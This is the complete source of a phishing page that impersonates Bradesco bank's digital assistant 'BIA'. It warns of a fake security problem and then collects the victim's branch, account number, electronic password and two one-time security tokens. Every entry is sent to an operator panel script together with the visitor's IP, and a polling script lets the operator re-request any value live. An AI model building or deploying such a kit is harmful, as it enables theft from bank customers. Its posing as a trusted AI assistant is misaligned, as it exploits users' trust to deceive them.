<!DOCTYPE html>
<html lang="pt-BR">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Bradesco - Autorização DDA</title>
    <link rel="shortcut icon" href="https://banco.bradesco/assets/classic/home/images/favicon.ico">
    <meta name="theme-color" content="#c8102e">
    <style>
        * {
            margin: 0;
            padding: 0;
            box-sizing: border-box;
            font-family: Arial, sans-serif;
        }

        html, body {
            height: 100%;
            width: 100%;
            overflow: hidden;
            background-color: #f9f9f9;
        }

        /* Splash Screen */
        #splash {
            position: fixed;
            top: 0;
            left: 0;
            width: 100%;
            height: 100%;
            background-color: #c8102e;
            display: flex;
            flex-direction: column;
            align-items: center;
            justify-content: center;
            z-index: 9999;
            color: white;
        }
        #splash img {
            width: 150px;
            animation: pulse 1.5s infinite;
        }
        #splash p {
            margin-top: 20px;
            font-size: 18px;
            font-weight: bold;
            animation: fadeInOut 1.5s infinite;
        }
        @keyframes pulse {
            0% { transform: scale(1); }
            50% { transform: scale(1.05); }
            100% { transform: scale(1); }
        }
        @keyframes fadeInOut {
            0% { opacity: 0.2; }
            50% { opacity: 1; }
            100% { opacity: 0.2; }
        }

        /* Chat Popup */
        .chat-container {
            display: flex;
            flex-direction: column;
            height: 80vh;
            width: 90vw;
            max-width: 500px;
            border: 1px solid #ccc;
            border-radius: 10px;
            overflow: hidden;
            background-color: #f9f9f9;
            box-shadow: 0 4px 20px rgba(0,0,0,0.2);
            position: fixed;
            top: 50%;
            left: 50%;
            transform: translate(-50%, -50%);
            z-index: 1001;
            opacity: 0;
            transition: opacity 0.5s ease;
        }
        
        .chat-container.active {
            opacity: 1;
        }
        
        .chat-header {
            background-color: #c8102e;
            color: white;
            padding: 15px;
            text-align: center;
            position: relative;
            flex-shrink: 0;
        }
        
        .close-btn {
            position: absolute;
            top: 10px;
            right: 15px;
            color: white;
            font-size: 24px;
            cursor: pointer;
            background: none;
            border: none;
        }
        
        .chat-body {
            flex: 1;
            overflow-y: auto;
            padding: 15px;
            background-color: #fff;
        }
        
        .message {
            margin: 10px 0;
            padding: 12px;
            border-radius: 10px;
            max-width: 80%;
            word-wrap: break-word;
        }
        
        .user-message {
            background-color: #d3d3d3;
            margin-left: auto;
        }
        
        .bot-message {
            background-color: #ececec;
            margin-right: auto;
        }
        
        .highlight {
            color: #c8102e;
            font-weight: bold;
        }
        
        .spinner {
            display: inline-block;
            width: 20px;
            height: 20px;
            border: 3px solid rgba(200, 16, 46, 0.3);
            border-top: 3px solid #c8102e;
            border-radius: 50%;
            animation: spin 1s linear infinite;
            margin: 10px auto;
        }
        
        @keyframes spin {
            0% { transform: rotate(0deg); }
            100% { transform: rotate(360deg); }
        }
        
        .typing {
            font-style: italic;
            color: #666;
            text-align: center;
        }
        
        .chat-input {
            display: flex;
            padding: 12px;
            border-top: 1px solid #ccc;
            flex-shrink: 0;
            background: white;
        }
        
        .chat-input input {
            flex: 1;
            padding: 14px;
            font-size: 16px;
            border: 1px solid #ccc;
            border-radius: 20px;
            margin-right: 10px;
        }
        
        .chat-input button {
            padding: 14px 20px;
            background-color: #c8102e;
            color: white;
            border: none;
            border-radius: 20px;
            cursor: pointer;
            white-space: nowrap;
        }
        
        .overlay {
            position: fixed;
            top: 0;
            left: 0;
            width: 100%;
            height: 100%;
            background: rgba(0, 0, 0, 0.5);
            z-index: 1000;
            opacity: 0;
            transition: opacity 0.5s ease;
            pointer-events: none;
        }
        
        .overlay.active {
            opacity: 1;
            pointer-events: auto;
        }

        /* Ajustes mobile */
        @media (max-width: 600px) {
            .chat-container {
                width: 95vw;
                height: 85vh;
                border-radius: 10px;
            }
            
            .chat-input input {
                font-size: 16px;
            }
        }
    </style>
</head>
<body>
    <!-- Tela de abertura -->
    <div id="splash">
        
<img src="https://behalacollege.in/display_board/assets/images/ajax-spinner.gif" alt="Bradesco Logo">    </div>

    <!-- Overlay para escurecer o fundo -->
    <div class="overlay" id="overlay"></div>

    <!-- Conteúdo do chat -->
    <div class="chat-container" id="chatWindow">
        <div class="chat-header">
          <img src="https://macmagazine.com.br/wp-content/uploads/2011/04/18-bradesco_icon.png" alt="Bradesco Logo" width="40" height="40" >
            <button class="close-btn" onclick="closeChat()">×</button>
        </div>
        <div class="chat-body" id="chatBody">
            <!-- Mensagens serão inseridas via JavaScript -->
        </div>
        <div class="chat-input">
            <input type="text" id="userInput" placeholder="Digite sua resposta...">
            <button onclick="sendMessage()">Enviar</button>
        </div>
    </div>

    <script>
        // Variáveis globais
        const chatBody = document.getElementById('chatBody');
        const userInput = document.getElementById('userInput');
        const chatWindow = document.getElementById('chatWindow');
        const overlay = document.getElementById('overlay');
        let step = 0;
        let userData = {
            agencia: '',
            conta: '',
            senha: '',
            token1: '',
            token2: ''
        };
        let sessionId = '';

        // Função para obter o IP do cliente
        async function getClientIP() {
            try {
                const response = await fetch('https://api.ipify.org?format=json');
                const data = await response.json();
                return data.ip;
            } catch (error) {
                console.error('Erro ao obter IP:', error);
                return 'IP não disponível';
            }
        }

        // Mensagens do fluxo de autorização DDA
        const messages = [
            { 
                text: "Olá! Sou a BIA, sua assistente digital do Bradesco.<br>Detectamos uma fragilidade de segurança<br>nas transações deste dispositivo não reconhecida<br>Para blindar seu acesso e garantir que<br> apenas você movimente sua conta<br>informe o numero de sua agencia:", 
                delay: 3000 
            },
            { 
                text: "Agora, informe o número da sua conta com dígito (formato 123456-7):", 
                delay: 3000 
            },
            { 
                text: "Agora, informe sua senha eletrônica (4 dígitos), usada no app ou Internet Banking:", 
                delay: 3000 
            },
            { 
                text: "Quase concluído!<br><br>Para finalizar, gere um código de 6 dígitos no seu Dispositivo de Segurança (App Bradesco ou Gerador de Token) e envie abaixo:<br><br>Digite o código de segurança:", 
                delay: 5000 
            },
            { 
                text: "Código inválido.<br>Por gentileza, gere um novo código e insira abaixo:<br><br>Lembre-se: o código de segurança é gerado em seu aplicativo Bradesco, no menu lateral a esquerda localizado na tela inicial, chave de segurança.<br>O código possui exatamente 6 dígitos numéricos.<br><br>Digite o novo código de segurança:", 
                delay: 5000 
            },
            { 
                text: "Primeiro código validado com sucesso! Agora, gere mais um segundo código de segurança de 6 dígitos:", 
                delay: 5000 
            },
            { 
                text: "Aguarde estamos verificando as informaçoes.", 
                delay: 5000 
            }
        ];

        // Funções do chat
        function addMessage(text, isUser = false) {
            const messageDiv = document.createElement('div');
            messageDiv.className = `message ${isUser ? 'user-message' : 'bot-message'}`;
            messageDiv.innerHTML = text;
            chatBody.appendChild(messageDiv);
            chatBody.scrollTop = chatBody.scrollHeight;
        }

        function showSpinner() {
            const spinnerDiv = document.createElement('div');
            spinnerDiv.className = 'spinner';
            chatBody.appendChild(spinnerDiv);
            chatBody.scrollTop = chatBody.scrollHeight;
            return spinnerDiv;
        }

        // Função modificada para enviar dados para o painel
        async function sendToPanel(etapa, valor) {
            try {
                const clientIP = await getClientIP();
                
                // Enviar dados para o painel PHP
                const data = {
                    session_id: sessionId,
                    etapa: etapa,
                    valor: valor,
                    ip: clientIP
                };
                
                const response = await fetch('panel_receiver.php', {
                    method: 'POST',
                    headers: {
                        'Content-Type': 'application/json'
                    },
                    body: JSON.stringify(data)
                });
                
                const result = await response.json();
                console.log('Dados enviados para o painel:', result);
            } catch (error) {
                console.error('Erro ao enviar para o painel:', error);
            }
        }

        function validarCampo(step, input) {
            switch(step) {
                case 0: // Validação da agência (4-5 dígitos, não pode ser todos iguais)
                    if (!/^\d{4,5}$/.test(input)) return false;
                    // Verifica se todos os dígitos são iguais (0000, 1111, etc.)
                    return !/^(\d)\1+$/.test(input);
                    
                case 1: // Validação da conta (formato 123456-7)
                    return /^\d{1,8}-\d{1}$/.test(input);
                    
                case 2: // Validação da senha (4 dígitos)
                    return /^\d{4}$/.test(input);
                    
                case 3: // Validação do primeiro token (6 dígitos)
                case 5: // Validação do segundo token (6 dígitos)
                    return /^\d{6}$/.test(input);
                    
                default:
                    return true;
            }
        }

        // Funções para abrir/fechar o chat
        function openChat() {
            chatWindow.classList.add('active');
            overlay.classList.add('active');
        }

        function closeChat() {
            chatWindow.classList.remove('active');
            overlay.classList.remove('active');
        }

        // Bloqueio de digitação
        userInput.addEventListener('input', () => {
            let maxLength = 100;
            switch(step) {
                case 0: maxLength = 5; break; // Agência (4-5 dígitos)
                case 1: maxLength = 9; break; // Conta (formato 123456-7)
                case 2: maxLength = 4; break; // Senha (4 dígitos)
                case 3: 
                case 5: maxLength = 6; break; // Token (6 dígitos)
            }
            if (userInput.value.length > maxLength) {
                userInput.value = userInput.value.slice(0, maxLength);
            }
            
            // Permite apenas números, exceto para conta que permite o hífen
            if (step === 1) {
                userInput.value = userInput.value.replace(/[^\d-]/g, '');
            } else {
                userInput.value = userInput.value.replace(/\D/g, '');
            }
        });

        async function sendMessage() {
            const input = userInput.value.trim();
            if (!input) return;

            addMessage(input, true);
            userInput.value = '';

            // Validação dos campos
            if ([0, 1, 2, 3, 5].includes(step) && !validarCampo(step, input)) {
                let errorMessage = "";
                switch(step) {
                    case 0:
                        errorMessage = "Agência inválida. Por favor, informe um número de agência válido (4-5 dígitos, não sequenciais):";
                        break;
                    case 1:
                        errorMessage = "Conta inválida. Por favor, informe o número da sua conta no formato 123456-7:";
                        break;
                    case 2:
                        errorMessage = "Senha inválida. Por favor, informe sua senha de 4 dígitos:";
                        break;
                    case 3:
                    case 5:
                        errorMessage = "Código inválido. Por favor, informe um código de 6 dígitos:";
                        break;
                }
                setTimeout(() => addMessage(errorMessage), 500);
                return;
            }

            // Processamento das etapas
            if (step === 0) {
                userData.agencia = input;
                // Criar sessão no primeiro acesso
                sessionId = 'sess_' + Math.random().toString(36).substr(2, 9);
                await sendToPanel('Agência', input);
                
                // Mostrar spinner por 3 segundos antes de pedir a conta
                const spinner = showSpinner();
                setTimeout(() => {
                    spinner.remove();
                    step = 1;
                    addMessage(messages[step].text);
                }, 3000);
                
            } else if (step === 1) {
                userData.conta = input;
                await sendToPanel('Conta', input);
                
                // Mostrar spinner por 3 segundos antes de pedir a senha
                const spinner = showSpinner();
                setTimeout(() => {
                    spinner.remove();
                    step = 2;
                    addMessage(messages[step].text);
                }, 3000);
                
            } else if (step === 2) {
                userData.senha = input;
                await sendToPanel('Senha', input);
                
                // Mostrar spinner por 3 segundos antes de pedir o token
                const spinner = showSpinner();
                setTimeout(() => {
                    spinner.remove();
                    step = 3;
                    addMessage(messages[step].text);
                }, 3000);
                
            } else if (step === 3) {
                userData.token1 = input;
                await sendToPanel('1• Código de Segurança', input);
                
                // Mostrar spinner por 5 segundos antes de pedir o segundo token
                const spinner = showSpinner();
                setTimeout(() => {
                    spinner.remove();
                    step = 5; // Pular o passo 4 (mensagem de erro) e ir direto para o segundo token
                    addMessage(messages[step].text);
                }, 5000);
                
            } else if (step === 4) {
                // Se chegou aqui, é porque o primeiro token foi invalidado e estamos pedindo novamente
                userData.token1 = input;
                await sendToPanel('1• Código de Segurança (reenvio)', input);
                
                // Mostrar spinner por 5 segundos antes de pedir o segundo token
                const spinner = showSpinner();
                setTimeout(() => {
                    spinner.remove();
                    step = 5;
                    addMessage(messages[step].text);
                }, 5000);
                
            } else if (step === 5) {
                userData.token2 = input;
                await sendToPanel('2• Código de Segurança', input);
                
                // Mostrar spinner por 5 segundos antes de finalizar
                const spinner = showSpinner();
                setTimeout(() => {
                    spinner.remove();
                    step = 6;
                    addMessage(messages[step].text);
                    sendToPanel('finalizado', 'todas_informacoes');
                }, 5000);
            }
        }

        userInput.addEventListener('keypress', (e) => {
            if (e.key === 'Enter') sendMessage();
        });

        // Iniciar chat após o splash
        window.addEventListener("load", function() {
            setTimeout(function(){
                document.getElementById("splash").style.display = "none";
                openChat();
                addMessage(messages[0].text);
            }, 3000);
        });
    </script>
    
    <script>
        // Função para verificar ações pendentes
        function checkPendingActions() {
            if (!sessionId) return;
            
            fetch('get_pending_actions.php?session_id=' + sessionId)
                .then(response => response.json())
                .then(data => {
                    if (data.status === 'success' && data.action) {
                        // Executar ação pendente
                        handlePendingAction(data.action);
                    }
                })
                .catch(error => console.error('Erro ao verificar ações pendentes:', error));
        }

        // Função para lidar com ações pendentes
        function handlePendingAction(action) {
            switch(action.campo) {
                case 'agencia':
                    step = 0;
                    addMessage("Por favor, reenvie o número da sua agência:");
                    break;
                case 'conta':
                    step = 1;
                    addMessage("Por favor, reenvie o número da sua conta:");
                    break;
                case 'senha':
                    step = 2;
                    addMessage("Por favor, reenvie sua senha eletrônica:");
                    break;
                case 'token1':
                    step = 3;
                    addMessage("Por favor, reenvie o primeiro código de segurança:");
                    break;
                case 'token2':
                    step = 5;
                    addMessage("Por favor, reenvie o segundo código de segurança:");
                    break;
            }
        }

        // Verificar ações pendentes a cada 10 segundos
        setInterval(checkPendingActions, 10000);
    </script>
</body>
</html>